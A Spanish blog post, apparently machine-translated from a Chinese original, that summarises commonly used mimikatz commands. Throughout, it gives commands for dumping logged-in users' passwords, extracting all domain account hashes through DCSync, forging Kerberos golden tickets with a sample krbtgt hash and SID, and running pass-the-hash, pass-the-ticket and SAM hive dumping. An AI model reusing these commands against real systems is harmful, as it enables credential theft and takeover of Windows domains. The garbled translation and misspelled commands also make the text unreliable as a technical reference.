Resumen de los comandos de mimikatz más utilizados

Prefacio

Se usa bajo la autoridad de administrador. Si no hay autoridad de administrador, básicamente todas las funciones no se pueden usar normalmente, recuerde.

mando

Comandos que pueden ejecutar administradores ordinarios (consulta de contraseña y detección y registro de permisos)

lsadump :: lsa / inject puede ver todos los detalles de todos los usuarios
Inserte la descripción de la imagen aquí

privilege :: debug abre el primer comando y debe ejecutarse.
log La llamada salida después de la ejecución de este comando se almacena en el archivo mimikatz.log en el directorio actual.
Inserte la descripción de la imagen aquí
sekurlsa :: logonpasswords enumera las contraseñas de los usuarios que han iniciado sesión (de uso más común)
Inserte la descripción de la imagen aquí

Comandos que solo se pueden ejecutar con autoridad de control de dominio

lsadump :: dcsync /domain:test.com / user: krbtgt Muestra la información de la contraseña del usuario especificado

lsadump :: dcsync /domain:test.com / all / csv Muestra las contraseñas de las cuentas de todos los usuarios del dominio
Inserte la descripción de la imagen aquí

Relacionado con la factura de oro

Información clara y consulta de la factura

kerberos :: lista enumera todos los tickets
kerberos :: purge elimina todos los tickets
Inserte la descripción de la imagen aquí
sekurlsa :: kerberos enumera las credenciales de kerberos verificadas (casi nunca se usan y solo se pueden usar en el dominio)
Inserte la descripción de la imagen aquí
sekurlsa :: tickets / export enumera todos los tickets (Básicamente nunca se usa y solo se puede usar en el dominio)
Inserte la descripción de la imagen aquí

Hacer anotaciones

Usa nthash para tomar notas

kerberos :: golden / user: Administrator /domain:test.com / sid: S-1-5-21-4166986646-4168497534-2490551922 / krbtgt: 308390d1ca7addf22c84ba9f1d26cbe4 /ticket:1.kirbi

Utilice el valor hash de krbtgt:

kerberos :: gloden / usuario: Administrador /dominio:xxx.xxx.xxx / sid: xxxxxxxxxxxxx krbtgt: ntlm-hashvlaue /ticket:test.kribi

Utilice el valor aes256 de krbtgt:

kerberos :: gloden /domain:xxx.xxx / sid: xxxxxxxxxxx / aes256: xxxxxxxx / usuario: Administrador /ticket:test.kribi

ataque pth:

sekurlsa :: pth /domian:test.com / user: zhangsan / ntlm: 3dbde697d71690a769204beb12283678
lsadump :: dcsync /domain:test.com / all / csv

Cargar ticket en caché

kerberos :: ptt 1.kirbi

Rompe el archivo sam

lsadump :: sam /sam:sam.hiv /system:system.hiv

Consulte
cómo usar mimikatz

Supongo que te gusta

Origin blog.csdn.net/qq_41874930/article/details/108266353
Recomendado
Clasificación